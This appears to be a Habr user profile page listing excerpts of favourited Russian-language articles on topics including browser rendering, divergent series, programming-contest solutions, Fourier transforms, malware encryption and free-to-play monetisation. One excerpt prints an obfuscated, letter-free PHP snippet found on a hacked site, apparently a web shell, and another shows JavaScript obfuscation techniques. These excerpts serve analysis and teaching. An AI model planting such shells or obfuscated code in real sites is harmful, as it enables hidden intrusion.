Pull to refresh
-5
0
Send message

Аппаратное ускорение в жизни верстальщика. Семинар в Яндексе

Reading time6 min
Views71K

Привет! Меня зовут Александр Завьялов. В Яндексе я занимаюсь разработкой интерфейсов. Недавно я выступил перед коллегами с докладом об аппаратном ускорении в жизни верстальщика, где также коснулся смежных тем. Рассказал о производительности веб-страниц, о том, как она измеряется и к чему она может стремиться.



Ссылка, если видео не отображается

На основе доклада я подготовил этот пост. Я расскажу о том, как браузеры оптимизировали процесс отрисовки: с чего начинали и до чего докатились. Что сейчас можно сделать, чтобы жизнь верстальщиков и пользователей стала немного лучше. Я надеюсь, что кого-нибудь натолкну на какие-нибудь улучшения. Мне бы это было приятно.


Читать дальше →
Total votes 96: ↑95 and ↓1+94
Comments21

Суммирование расходящихся рядов методами Абеля, Бореля, Чезаро и Дирихле

Reading time7 min
Views51K

Перевод поста Давендра Кападия (Devendra Kapadia) "The ABCD of Divergent Series."
Выражаю благодарность за помощь в переводе Андрею Дудину.


Какова сумма всех натуральных чисел? Интуиция подсказывает, что ответ — бесконечность. В математическом анализе сумма натуральных чисел является простым примером расходящегося ряда. Тем не менее, математики и физики сочли полезным придать дробные, отрицательные и даже нулевые значения суммам таких рядов. Цель моей статьи — желание отодвинуть завесу тайны, окружающую результаты суммирования расходящихся рядов. В частности, я буду использовать функцию Sum (функция поиска частичных сумм, рядов и т. п. в Mathematica), а так же другие функции в Wolfram Language для того, чтобы объяснить в каком смысле стоит рассматривать следующие утверждения:

Summirovanie-rashodjashhihsja-rjadov_1.gif


Важность обозначений формул буквами A, B, C, и D вскоре станет вам понятна.
Читать дальше →
Total votes 60: ↑56 and ↓4+52
Comments30

«Нет времени объяснять!» или Как реализовать трансляцию с IP камеры на сайт?

Reading time7 min
Views115K
image


Пожалуй, мне везет на идиотские задачи в самый неподходящий момент. Это что, карма такая?! Ну да ладно…
В данном «отпускном» посте речь пойдет о том, как при наличии 3g модема и ноутбука реализовать трансляцию с IP-камеры на сайт.
Сам пост я бы не написал, если бы не задал вопрос на «Тостере», где мне подсказали, что гуглить.

Что мы имеем?


  1. Недешевая IP камера AXIS Q1755, которую я даже в руках не держал. Сама камера находится в городе «А» и подключена через тормозной 3g модем.
  2. Сервер на Debian 7, который крутится на почти дохлом Core2Duo. Хотя не такой уж он и дохлый, но для данных задач подходит не очень. Ах, да, сам сервер живет в городе Б.
  3. Сайт, на который необходимо повесить плеер. Находится на другом, более производительном сервере, в том же городе Б.
  4. Я, который находится в городе В, с ноутбуком, 3g-модемом и ограниченным трафиком в 4gb.

Читать дальше →
Total votes 57: ↑56 and ↓1+55
Comments31

Разбор задач третьего квалификационного раунда Russian Code Cup 2014

Reading time3 min
Views12K


В субботу 24 мая прошел третий квалификационный раунд RCC 2014. На участие в раунде зарегистрировалось 5483 человека, приняло участие более 1500, из них хотя бы одно решение прислали 893 участника.

Прищенко Богдан (LeBron), студент Львовского национального университета им. Ивана Франко, первым на 2:25 минуте решил задачу А (Треугольники). Задачу В (Оригами) на 4:44 минуте первым решил Юлдашев Марат (snowbear), задачу С (Митя и граф) первым на 10:34 минуте решил Ахмедов Максим (Zlobober), правильное решение задачи D (Призы) на 26:45 минуте прислал Копелиович Сергей (Burunduk1), а последнюю задачу E (Криптостойкие ключи) быстрее всех решил Пономарев Павел (pperm) на 54:38 минуте.

По итогам 3 квалификационного раунда не было ни одной дисквалификации за списывание, а 200 лучших спортивных программистов перешли в отборочный раунд.
Читать дальше →
Total votes 38: ↑34 and ↓4+30
Comments2

Тривиальное шифрование во вредоносных файлах

Reading time8 min
Views26K
Привет. Это снова Алексей Маланов из «Лаборатории Касперского». В прошлый раз я рассказывал про опыт найма вирусных аналитиков, а сегодня расскажу про то, что делают вирусописатели, чтобы их работа не была замечена, и что делаем мы, чтобы их труд в итоге оказался напрасен.

Вообще говоря, злоумышленник пишет вредоносную программу, почти всегда заранее зная, что она рано или поздно попадет на «операционный стол» вирусному аналитику. И вся информация из зловреда может быть использована против автора. А чего ему скрывать? Ну, во-первых свою личность. Порой в зловредах встречаешь строки, типа C:\Users\Vasiliy Ivanov\Documents\Visual Studio 2005\заработок\trojan\Release\trojan.pdb. Во-вторых, довольно много информации, облегчающей анализ зловреда. Давайте рассмотрим некоторые приемы вирусописателей, и выясним, почему же они бесполезны.
Читать дальше →
Total votes 39: ↑33 and ↓6+27
Comments44

Пять удивительных математических фактов

Reading time4 min
Views148K
Для начала небольшой спойлер

Да я знаю, что если написать фамилию с заглавной буквы, казуса не получится. Дальше перевод.

Математика – одна из немногих областей знаний, которая может быть объективно названа истинной, потому что ее теоремы основаны на чистой логике. Но в то же время эти теоремы часто оказываются очень странными и противоречащими интуиции.

Некоторые люди считают математику скучной. Следующие примеры показывают, что она какая угодно, но не такая
Читать дальше →
Total votes 167: ↑141 and ↓26+115
Comments271

Избранное: ссылки по IT безопасности

Reading time3 min
Views110K




Давно хотел написать этот пост с подборкой полезных ссылок, так как очень часто спрашивают подобное (думаю, у многих, кто в этой (да и в других) сфере). Ссылки разбиты на категории.




Читать дальше →
Total votes 92: ↑86 and ↓6+80
Comments18

Я знаю, что ты знаешь, что я знаю, что ты знаешь…

Reading time3 min
Views31K
Вольный перевод одного из ответов с mathoverflow. Ответ, в принципе, такой самодостаточный и интересный, что вполне может быть прочитан и без усвоения сути вопроса. Поэтому, если по каким-либо причинам вы застопорились на прочтении вопроса, я вам советую перейти сразу к ответу.

Вопрос

Иногда в жизни бывают ситуации, которые описываются предложениями типа: «я знаю, что ты знаешь, что я знаю… что-то». Представьте себе, что вы испекли вишневый пирог и положили его остывать на подоконнике, а я потом втихаря его съел. Приведем список все более и более сложных предложений, которые все ближе и ближе подводят нас к полному знанию о происходящем. Например,

: «Я знаю, что вы испекли пирог и положили его остывать на подоконник; но вы не знаете, что я знаю». В таком случае, если я съем пирог, то об этом скорее всего никто и не узнает.

: «Я знаю, что вы испекли пирог и положили его остывать на подоконник; вы знаете, что я знаю; но я не знаю, что вы знаете, что я знаю». Если я съем пирог, то это может привести к довольно к щекотливой ситуации для меня.

: «Я знаю, что вы испекли пирог и положили его остывать на подоконник; вы знаете, что я знаю; я знаю, что вы знаете, что я знаю; но вы не знаете, что я знаю. что вы знаете, что я знаю». В таком случае после того как я съем пирог у меня останется надежда вывернуть ситуацию так, что вы не узнаете о моем преступлении.


Для маленьких значений , я еще могу вообразить, как при переходе от предложения к действительно меняется суть происходящего. Но я совершенно не могу вообразить, как, скажем, переход от к может повлиять на мою стратегию действий после того, как я съем пирог.

Есть ли какие-либо ситуации в жизни, будь-то реальные или искусственные, где переход от к для больших значений может реально повлиять на стратегию действий? А что насчет ? Как такие ситуации моделируются в математике?
Ответ
Total votes 59: ↑50 and ↓9+41
Comments65

Непрактичные сортировки – бессмысленные и беспощадные

Reading time7 min
Views103K
image

А что это мы всё об умных да об эффективных алгоритмах? А давайте эту тоскливую осеннюю пятницу развеем чем-нибудь контрпродуктивным!?

Представляю Вашему вниманию ТОП-5 самых нетрадиционных сортировок всех времён и народов.

Младопрограммистам такое полезно показывать в дидактических целях. Всех остальных как минимум позабавит.
Начнём
Total votes 95: ↑82 and ↓13+69
Comments54

Простыми словами о преобразовании Фурье

Level of difficultyMedium
Reading time14 min
Views1.1M
Я полагаю что все в общих чертах знают о существовании такого замечательного математического инструмента как преобразование Фурье. Однако в ВУЗах его почему-то преподают настолько плохо, что понимают как это преобразование работает и как им правильно следует пользоваться сравнительно немного людей. Между тем математика данного преобразования на удивление красива, проста и изящна. Я предлагаю всем желающим узнать немного больше о преобразовании Фурье и близкой ему теме того как аналоговые сигналы удается эффективно превращать для вычислительной обработки в цифровые.

image (с) xkcd

Без использования сложных формул и матлаба я постараюсь ответить на следующие вопросы:
  • FT, DTF, DTFT — в чем отличия и как совершенно разные казалось бы формулы дают столь концептуально похожие результаты?
  • Как правильно интерпретировать результаты быстрого преобразования Фурье (FFT)
  • Что делать если дан сигнал из 179 сэмплов а БПФ требует на вход последовательность по длине равную степени двойки
  • Почему при попытке получить с помощью Фурье спектр синусоиды вместо ожидаемой одиночной “палки” на графике вылезает странная загогулина и что с этим можно сделать
  • Зачем перед АЦП и после ЦАП ставят аналоговые фильтры
  • Можно ли оцифровать АЦП сигнал с частотой выше половины частоты дискретизации (школьный ответ неверен, правильный ответ — можно)
  • Как по цифровой последовательности восстанавливают исходный сигнал


Я буду исходить из предположения что читатель понимает что такое интеграл, комплексное число (а так же его модуль и аргумент), свертка функций, плюс хотя бы “на пальцах” представляет себе что такое дельта-функция Дирака. Не знаете — не беда, прочитайте вышеприведенные ссылки. Под “произведением функций” в данном тексте я везде буду понимать “поточечное умножение”

Итак, приступим?
Total votes 203: ↑192 and ↓11+181
Comments190

Russian Code Cup 2013: разбираем задачи финала

Reading time20 min
Views28K


23 сентября 2013 года состоялся финал чемпионата по программированию Russian Code Cup 2013.

Первое место занял Петр Митричев (кстати, чемпион RCC 2011). Второй приз взял Геннадий Короткевич, третье — Дмитрий Джулгаков.

Сегодня мы публикуем подробный разбор шести задач, которые были предложены финалистам RCC (спойлер: одна из них так и осталась нерешенной). В программе — сортировка невиданной быстроты, борьба с капибарным гриппом, путешествия роботов и многое другое.

Читать дальше →
Total votes 68: ↑59 and ↓9+50
Comments5

Как измерить релевантность контента

Reading time10 min
Views11K
Оценка контента одна из главных составляющих формулы релевантности. Знание текстовых признаков и вклад каждого из них в оценку сайта позволит приблизиться к более профессиональной работе с ресурсом. В данной статье будет рассмотрена модель, позволяющая восстановить формулу ранжирования по каждому конкретному запросу, указана значимость определение тематики сайта при продвижении по определенному запросу, а также проработан вопрос, связанного с определением неестественного текста.

Восстановление формулы ранжирования

Если переводить данную задачу в область математики, то входные данные можно представить набором векторов, где каждый вектор – множество характеристик каждого сайта, а координаты в векторе – параметр, по которым оценивается сайт. В описанном векторном пространстве обязательно должна быть задана функция, определяющая отношение порядка двух объектов между собой. Эта функция позволяет ранжировать объекты между собой по принципу «больше — меньше», однако при этом сказать, насколько именно одно больше или меньше другого – нельзя. Такого вида задачи относятся к задачам оценки порядковой регрессии.
Наши сотрудники разработали алгоритм на основе модели линейной регрессии с регулируемой селективностью, который позволил с определенной долей погрешности восстановить ранги сайтов и спрогнозировать изменение выдачи при соответствующих корректировках параметров сайта. Первым шагом алгоритма является обучение модели. В данном случае обучающая выборка представляет собой результаты ранжирования сайтов в рамках одного поискового запроса. Упорядоченность сайтов в рамках поискового запроса фактически означает, что в признаковом пространстве существует некоторое направление, на которое объекты обучающей выборки должны проектироваться в нужном порядке. Это направление и является искомым в задаче восстановления формулы ранжирования. Однако судя по рис.1, таких направлений может быть много.
image
Рис. 1. Выбор направляющего вектора

Для решения данного вопроса был рассмотрен подход, лежащий в основе метода опорных точек, а именно – выбор такого направления, которое будет обеспечивать максимальное удаление объектов друг от друга.
Следующая задача, которая была решена — выбор стратегии обучения. Рассматривалось два варианта – сокращенная стратегия обучения, при которой учитывается порядок двух соответствующих элементов, и полная стратегия, которая учитывает весь порядок объектов. В результате экспериментов была выбрана сокращенная стратегия, которая заключается в решении следующего уравнения:(1)
image, где image — решение стандартной задачи квадратичного программирования при линейных ограничениях: image, где
image — симметричная матрица
image — вектор коэффициента
image — разница векторов характеристик

Данный подход на различных выборках (100 признаков и 500 признаков на 20 различных множествах поисковых запросов) показал хорошие результаты (см. табл. 1).

Читать далее
Total votes 16: ↑14 and ↓2+12
Comments4

Обфускация JavaScript

Reading time5 min
Views196K
В статье собраны всем известные методы и предельно извращенные. Эту статью я решил написать после недавнего прочтения поста в блоге Badass JavaScript и решил её дополнить своими находками.

Первый способ


Он всем известен — обфускация минимизаторами такими как JS Packer, JSmin, YUI Compressor, Closure compiler или можно просто пугуглить «JavaScript Obfuscator» и найдется ещё сто штук разных обфускаторов.
Они превращают существующий код
function MyClass(){
    this.foo = function(argument1, argument2){
        var addedArgs = parseInt(argument1)+parseInt(argument2);
        return addedArgs;
    }
    var anonymousInnerFunction = function(){
        // do stuff here!
    }
}

В какой-то такой вид:
function MyClass(){this.foo=function(c,b){var d=parseInt(c)+parseInt(b);return d};var a=function(){}};

Или такой:
var _0xd799=["\x66\x6F\x6F"];function MyClass(){this[_0xd799[0]]=function (_0xefcax2,_0xefcax3){var _0xefcax4=parseInt(_0xefcax2)+parseInt(_0xefcax3);return _0xefcax4;} ;var _0xefcax5=function (){} ;} ;

Или вот такой:
eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('4 0="3 5!";9 2(1){6(1+"\\7"+0)}2("8");',10,10,'a|msg|MsgBox|Hello|var|World|alert|n|OK|function'.split('|'),0,{}))

Но ничего не стоит его восстановить с помощью jsbeautifier.org либо просто убрать eval и получить исходный код, многое потеряем, но смысл кода восстановим. Ну и с первого взгляда мы видим, что перед нами JavaScript.

Все это были цветочки под катом жесткие методы обфускации.
Читать дальше →
Total votes 171: ↑165 and ↓6+159
Comments85

PHP-шелл без единого буквенно-цифрового символа

Reading time1 min
Views89K
Вчера в блоге компании Sucuri появился любопытный вопрос: некий владелец сайта, обнаружив его взломанным, был немало удивлён, обнаружив следующий злонамеренный код; что именно он делает?
@$_[]=@!+_; $__=@${_}>>$_;$_[]=$__;$_[]=@_;$_[((++$__)+($__++ ))].=$_;
$_[]=++$__; $_[]=$_[--$__][$__>>$__];$_[$__].=(($__+$__)+ $_[$__-$__]).($__+$__+$__)+$_[$__-$__];
$_[$__+$__] =($_[$__][$__>>$__]).($_[$__][$__]^$_[$__][($__<<$__)-$__] );
$_[$__+$__] .=($_[$__][($__<<$__)-($__/$__)])^($_[$__][$__] );
$_[$__+$__] .=($_[$__][$__+$__])^$_[$__][($__<<$__)-$__ ];
$_=$ 
$_[$__+ $__] ;$_[@-_]($_[@!+_] );

Как видно, в коде нет ни вызовов функций, ни вообще какого-либо буквенно-цифрового символа.
Узнать подробности
Total votes 119: ↑105 and ↓14+91
Comments33

И снова закинул старик невод… (парсинг хабра, продолжение)

Reading time2 min
Views16K
Примерно месяц назад я опубликовал пост Вернулся невод с тиной морскою..., речь там шла о сравнении частотных словарей Википедии и Башорга. В комментах было много идей насчёт того, как это сделать правильно, а так же просьб распарсить другие сайты — Луркмор и конечно же Хабрахабр.
Читать дальше →
Total votes 36: ↑31 and ↓5+26
Comments51

Мошеннические методы монетизации в free-to-play играх

Reading time11 min
Views136K
Примечание переводчика: После публикации статьи с автором связался коммерческий директор из King.com, создателя Candy Crush Saga, и прояснил несколько моментов, после чего автор добавил пару замечаний. Добавленные абзацы отмечены курсивом.

Принудительная монетизация


Модель принудительной монетизации основывается на уловках, с помощью которых можно заставить человека совершить покупку с неполной информацией, или сокрытии этой информации так, что технически она остаётся доступной, но мозг потребителя не улавливает эту информацию. Сокрытие покупки может быть осуществлено с помощью простой маскировки связи между действием и ценой, как я писал в статье Системы контроля в F2P.

Согласно исследованиям, добавление даже одной промежуточной валюты между потребителем и реальными деньгами, например «игровых самоцветов» (премиальная валюта), делает потребителя гораздо менее подготовленными к оценке стоимости сделки. Лишние промежуточные предметы, я называю их «наслоения», делают для мозга оценку ситуации очень сложной, особенно под напряжением.

Этот дополнительный стресс часто подаётся в форме того, что Роджер Дики из Zynga называет «весёлыми мучениями». Приём заключается в том, чтобы поставить потребителя в очень неудобное или неприятное положение в игре, а потом предложить ему убрать эти «мучения» в обмен на деньги. Эти деньги всегда замаскированы в слоях принудительной монетизации, поскольку потребитель, столкнувшийся с «реальной» покупкой, скорее всего не поведётся на трюк.
Читать дальше →
Total votes 138: ↑131 and ↓7+124
Comments76

Information

Rating
Does not participate
Date of birth
Registered
Activity